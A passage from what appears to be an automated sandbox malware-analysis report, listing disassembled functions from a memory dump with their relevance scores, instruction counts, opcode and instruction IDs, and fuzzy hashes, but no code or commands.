                              • Opcode Fuzzy Hash: fc6cc2b936536ffc1f8e15366c99711c73249d7e81d6554c474f2e041c156c97
                              • Instruction Fuzzy Hash: 45011232E6C51D89FF58A25CA4535F863D5DB46334F240077E65E932C2DC193C5293C5
                              Function 00007FFF60F6927F Relevance: .1, Instructions: 55COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4132da37863102ff7bb70212f531a98c29bc7bca8e652a365c109bc957091b71
                              • Instruction ID: 582c8c41237c9a6a7c704aee6094df21aa3cc321d10abc46cd4ded3c8ad54a97
                              • Opcode Fuzzy Hash: 4132da37863102ff7bb70212f531a98c29bc7bca8e652a365c109bc957091b71
                              • Instruction Fuzzy Hash: 77014031E2C91C9EEB50EB6CD4886AC77E9FF58321F150237E44DE3290DE3858818781
                              Function 00007FFF60F6A4C1 Relevance: .1, Instructions: 54COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 16358d968be7b6a0d9cebfb93859d4413bf2b15816b7ca69a36a16b30af709e9
                              • Instruction ID: 3061f076684b6b007141467294b50f73b589be59f5c725ce5c59f1ec6c577436
                              • Opcode Fuzzy Hash: 16358d968be7b6a0d9cebfb93859d4413bf2b15816b7ca69a36a16b30af709e9
                              • Instruction Fuzzy Hash: 18011230B2C91ACFEB84E76C94556B873D1EF49305B600079E50EC33A2ED25AC429B40
                              Function 00007FFF60F61668 Relevance: .0, Instructions: 39COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c989ea6f71ff5d453dea08b1b6474f98225e31beec01a2f790754889de3998a9
                              • Instruction ID: e9e89ca1b3ac7a03f4aeea6e2ab0626fefb0851af608c92077f4a2390a394797
                              • Opcode Fuzzy Hash: c989ea6f71ff5d453dea08b1b6474f98225e31beec01a2f790754889de3998a9
                              • Instruction Fuzzy Hash: 7DF09646C3E46B8AF79071A8E4552A873C4FB153A0F6E0870E98CD72C1DD0D1C4123D9
                              Function 00007FFF60F680D8 Relevance: .0, Instructions: 34COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7d927548f172c14d579b24a4596919dc4f8509051651c34f2448c594530dfb5b
                              • Instruction ID: 3f6ddbeef207d27c2f5a83139b08710c9670cb4eaf515712a5d772210861c5ea
                              • Opcode Fuzzy Hash: 7d927548f172c14d579b24a4596919dc4f8509051651c34f2448c594530dfb5b
                              • Instruction Fuzzy Hash: 50E06D10F2D80E86AAA8511D28602B912C9DBA6310FB8023EF50EC37C0EC9E5C832295
                              Function 00007FFF60F680E0 Relevance: .0, Instructions: 34COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eb65ced9a50445ba8fc7b8d4f53ade41dd3d12624671f02cbf7b23c081541d94
                              • Instruction ID: c79f28b7d37efb16a186a6064839ef57f2abbbee8122aacae2332b63426d8c6f
                              • Opcode Fuzzy Hash: eb65ced9a50445ba8fc7b8d4f53ade41dd3d12624671f02cbf7b23c081541d94
                              • Instruction Fuzzy Hash: 51E01211F3D81B95B6A8212D68551B922C9DB8BB50F74073EF40DD23C9FE8CAC836193
                              Function 00007FFF60F6C0F1 Relevance: .0, Instructions: 33COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 48ff86202776cce8c0526b9a2216b95e0586c4d0ac40073048de183ac7eef0b5
                              • Instruction ID: d366286556cc3fc54417c088b55a4645f0f7fc964385b1a60c2ddf68593e517e
                              • Opcode Fuzzy Hash: 48ff86202776cce8c0526b9a2216b95e0586c4d0ac40073048de183ac7eef0b5
                              • Instruction Fuzzy Hash: 24E0923192C5558FEB002650E4840F963D4EF9B310F6405B6E848C72D3CC1D25939394
                              Function 00007FFF60F6BC51 Relevance: .0, Instructions: 32COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 65e8a3c46c8608babf5b3722bf3a73274e6a9a02369f14694569c2e4a84e7413
                              • Instruction ID: 26cc7a2d45cf90f117b8b2208c67cf394bbf2e1281673ccc640fb6803bffdb21
                              • Opcode Fuzzy Hash: 65e8a3c46c8608babf5b3722bf3a73274e6a9a02369f14694569c2e4a84e7413
                              • Instruction Fuzzy Hash: 0BE0222092C2A28FE3201720E0981F877D4FF56310F2408B6E4085B6D3CC2E26826311
                              Function 00007FFF60F63810 Relevance: .0, Instructions: 32COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7809d5c54a5d21497828a9f54317656a3c0bbf0800ac38d3ca169797fdb209f6
                              • Instruction ID: 235e90c69d9779d9fe7d6ae0a7fddf91ec38ad48a879128755f58b7ceceb4fe8
                              • Opcode Fuzzy Hash: 7809d5c54a5d21497828a9f54317656a3c0bbf0800ac38d3ca169797fdb209f6
                              • Instruction Fuzzy Hash: DFE06D32E2C93A8AF6A8363891152F852D5EB49361F9908B7E80DD33D2ED1D9D815280
                              Function 00007FFF60F6B8C0 Relevance: .0, Instructions: 28COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3e0efbce6c77c564b7706b52107fb7121fc7df6c933097c97e9c2363ab4e2eef
                              • Instruction ID: 146c8d460a875ce19c41dd37062740be557ce1c7876c604c459006976397a82a
                              • Opcode Fuzzy Hash: 3e0efbce6c77c564b7706b52107fb7121fc7df6c933097c97e9c2363ab4e2eef
                              • Instruction Fuzzy Hash: 66E09A32E3D44A96FBF891294809A3626CDDBD0350F311D3AFA0DC33D4ED1CA8866696
                              Function 00007FFF60F6865E Relevance: .0, Instructions: 28COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 702563ce90e0393ee801919a3f3be75b49cbe2a68b059c93ccaf6169103901bc
                              • Instruction ID: 4266c40ec1585e508b47c753ed47c13cfc46f7c7a874c37376c470353966b2e4
                              • Opcode Fuzzy Hash: 702563ce90e0393ee801919a3f3be75b49cbe2a68b059c93ccaf6169103901bc
                              • Instruction Fuzzy Hash: B9F06520E3D90796F754A224C5891B612C9EF17345F74477CF90B833C5DD9DBC426182
                              Function 00007FFF60F6C9C0 Relevance: .0, Instructions: 25COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7b94df1f68bb0ca647fe0c3c0dc20f41e5619a6d77dd09d321cf6d33b4a8906f
                              • Instruction ID: 536c5e44d3f310561ae23e98b61bd376382c56d8d42d491359a52ad62f31a665
                              • Opcode Fuzzy Hash: 7b94df1f68bb0ca647fe0c3c0dc20f41e5619a6d77dd09d321cf6d33b4a8906f
                              • Instruction Fuzzy Hash: 0FE08601B2CC498BE681B33800792BC47E3EF9A305728007AE44EC3393ED585D036305
                              Function 00007FFF60F6C28A Relevance: .0, Instructions: 19COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d66117756e6d7ca0f8c1facb36af2a9f31fa8c1be915c29f6928b0f1bc6ad4af
                              • Instruction ID: 72d0782125199da3052597862adfea3e98b0595865d9f47ff2f0158105cd1224
                              • Opcode Fuzzy Hash: d66117756e6d7ca0f8c1facb36af2a9f31fa8c1be915c29f6928b0f1bc6ad4af
                              • Instruction Fuzzy Hash: 32D05E3161D90DCECF45ABA494063FD77A4FF85319FA0187AE10ADA2C1CE3A84A4D7C0
                              Function 00007FFF60F6888C Relevance: .0, Instructions: 16COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 206e1c6549962e3a45060f6bbc7891bbed173d67357739a4cc7aa0f69d6fb7bf
                              • Instruction ID: 10f852d9b573ce49847f632c57905c4d2bac3b720d09fe61512c933ce6cca8e9
                              • Opcode Fuzzy Hash: 206e1c6549962e3a45060f6bbc7891bbed173d67357739a4cc7aa0f69d6fb7bf
                              • Instruction Fuzzy Hash: 84C0801171DC085B5640F11C649E77D63D2E7EC161728413ED40DC3355DC34D9478342
                              Function 00007FFF60F6860C Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7b06f8108f355254a861dae0793761e1f51959e65a191ae3a6e4d1208b9b0a56
                              • Instruction ID: 310dbc2472decb4e558391ea125394f77190fdba0fd801815b7fc893a2a9935c
                              • Opcode Fuzzy Hash: 7b06f8108f355254a861dae0793761e1f51959e65a191ae3a6e4d1208b9b0a56
                              • Instruction Fuzzy Hash: 03D0123165A71589E758373966111A862C5EF45256B9404BAE90DC43A2FD2EC5C14350
                              Function 00007FFF60F6C9FC Relevance: .0, Instructions: 5COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5ecfb4522fe41fab7df08b19ca74bd3a197deb4e4662c1e81acd057a591f07bb
                              • Instruction ID: eaab48cd6b7b447fd7e08d554f13cdbc886689a98a0f3e2637f00d175d5f409d
                              • Opcode Fuzzy Hash: 5ecfb4522fe41fab7df08b19ca74bd3a197deb4e4662c1e81acd057a591f07bb
                              • Instruction Fuzzy Hash: 69A00214B1580F0A76C4A13C041937941CBE7A9282B6480B7690DCA296DD1459410716